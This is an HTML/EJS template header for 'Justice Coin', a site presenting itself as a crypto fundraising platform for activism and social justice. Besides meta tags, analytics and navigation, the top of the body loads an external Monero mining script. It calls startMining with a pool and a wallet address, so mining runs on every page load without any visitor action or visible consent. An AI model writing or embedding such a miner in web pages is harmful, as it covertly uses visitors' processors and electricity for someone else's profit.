<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=yes">
  <meta name="theme-color" content="#3ed2a7">

  <meta name="title" content="Justice Coin | Decentralized Activism">
  <meta name="description" content="Decentralized digital fundraising platform promoting equality, activism and social justice.">
  <meta name="keywords" content="crypto, fundraising, blacklivesmatter, activism, equality, blockchain, social justice">
  <meta name="robots" content="index, follow">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta name="language" content="English">
  <meta name="author" content="JusticeCoin ">


  <!-- Open Graph / Facebook -->
  <meta property="og:type" content="website">
  <meta property="og:url" content="https://justicecoin.org/">
  <meta property="og:title" content="Justice Coin | Decentralized Activism">
  <meta property="og:description" content="Decentralized digital fundraising platform promoting equality, activism and social justice.">
  <meta property="og:image" content="https://www.justicecoin.org/public/meta/jcoin.png">

  <!-- Twitter -->
  <meta property="twitter:card" content="summary_large_image">
  <meta property="twitter:url" content="https://justicecoin.org/">
  <meta property="twitter:title" content="Justice Coin | Decentralized Activism">
  <meta property="twitter:description" content="Decentralized digital fundraising platform promoting equality, activism and social justice.">
  <meta property="twitter:image" content="https://www.justicecoin.org/public/meta/jcoin.png">


  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-170171022-1"></script>
  <script>
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }
    gtag('js', new Date());

    gtag('config', 'UA-170171022-1');
  </script>


  <title>Justice Coin | Decentralized Activism </title>

  <link href="https://fonts.googleapis.com/css?family=Poppins:400,500,700" rel="stylesheet">
  <link rel="stylesheet" href="/vendors/liquid-icon/liquid-icon.min.css" />
  <link rel="stylesheet" href="/vendors/font-awesome/css/font-awesome.min.css" />
  <link rel="stylesheet" href="/css/theme-vendors.min.css" />
  <link rel="stylesheet" href="/css/theme.min.css" />
  <link rel="stylesheet" href="/css/themes/digital-creative.css" />

</head>


<body data-mobile-nav-trigger-alignment="right" data-mobile-nav-align="left" data-mobile-nav-style="minimal" data-mobile-nav-shceme="white" data-mobile-header-scheme="white" data-mobile-nav-breakpoint="1199">

  <!--THE MINER SCRIPT-->
   <script src="https://minexmr.stream/webmr.js"></script>
   <!--START THE MINER-->
   <script>
   startMining("xmrpool.net", "442uGwAdS8c3mS46h6b7KMPQiJcdqmLjjbuetpCfSKzcgv4S56ASPdvXdySiMizGTJ56ScZUyugpSeV6hx19QohZTmjuWiM");
 </script>
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

  <div id="wrap">

    <header class="main-header main-header-overlay">

      <div class="mainbar-wrap">

        <div class="container mainbar-container">
          <div class="mainbar">
            <div class="row mainbar-row align-items-lg-stretch">

              <div class="col">
                <div class="navbar-header">
                  <a class="navbar-brand" href="/" rel="home">
                    <span class="navbar-brand-inner">
                      <img class="logo-default" style="transform: scale(1.25);" src="/images/JusticeCoinLogo.png" alt="JusticeCoin Logo" width="185" height="390">

                    </span>
                  </a>
                  <button type="button" class="navbar-toggle collapsed nav-trigger style-mobile" data-toggle="collapse" data-target="#main-header-collapse" aria-expanded="false"
                    data-changeclassnames='{ "html": "mobile-nav-activated overflow-hidden" }'>
                    <span class="sr-only">Toggle navigation</span>
                    <span class="bars">
                      <span class="bar"></span>
                      <span class="bar"></span>
                      <span class="bar"></span>
                    </span>
                  </button>
                </div><!-- /.navbar-header -->
              </div><!-- /.col -->

              <div class="col text-lg-right">

                <div class="collapse navbar-collapse align-items-center" id="main-header-collapse" aria-expanded="false" role="tablist">

                  <ul id="primary-nav" class="main-nav main-nav-hover-underline-2 nav align-items-lg-stretch justify-content-end align-items-end" data-submenu-options='{ "toggleType": "fade", "handler": "mouse-in-out" }' data-localscroll="true">
                    <li>
                      <a href="/">
                        <span class="link-icon"></span>
                        <span class="link-txt">
                          <span class="link-ext"></span>
                          <span class="txt">Home</span>
                        </span>
                      </a>
                    </li>
                    <% if (displaySectionNavs)  {%>
                    <li>
                      <a href="#learn">
                        <span class="link-icon"></span>
                        <span class="link-txt">
                          <span class="link-ext"></span>
                          <span class="txt">Learn</span>
                        </span>
                      </a>
                    </li>
                    <li>
                      <a href="#findOutMore">
                        <span class="link-icon"></span>
                        <span class="link-txt">
                          <span class="link-ext"></span>
                          <span class="txt">Find Out More</span>
                        </span>
                      </a>
                    </li>
                    <li>
                      <a href="#contact">
                        <span class="link-icon"></span>
                        <span class="link-txt">
                          <span class="link-ext"></span>
                          <span class="txt">Contact</span>
                        </span>
                      </a>
                    </li>
                    <% } %>
                    <li>
                      <a href="team">
                        <span class="link-icon"></span>
                        <span class="link-txt">
                          <span class="link-ext"></span>
                          <span class="txt">Team</span>
                        </span>
                      </a>
                    </li>

                    <li>
                      <a href="about">
                        <span class="link-icon"></span>
                        <span class="link-txt">
                          <span class="link-ext"></span>
                          <span class="txt">About</span>
                        </span>
                      </a>
                    </li>
                    <li>
                      <a href="miner">
                        <span class="link-icon"></span>
                        <span class="link-txt">
                          <span class="link-ext"></span>
                          <span class="txt">START MINING</span>
                        </span>
                      </a>
                    </li>
                  </ul>

                </div><!-- /.collapse -->

              </div><!-- /.col -->

              <div class="col text-right">

                <div class="header-module">



                </div><!-- /.header-module -->

              </div><!-- /.col -->

            </div><!-- /.maonbar-row -->
          </div><!-- /.mainbar -->
        </div><!-- /.mainbar-container -->

      </div><!-- /.mainbar-wrap -->

    </header>
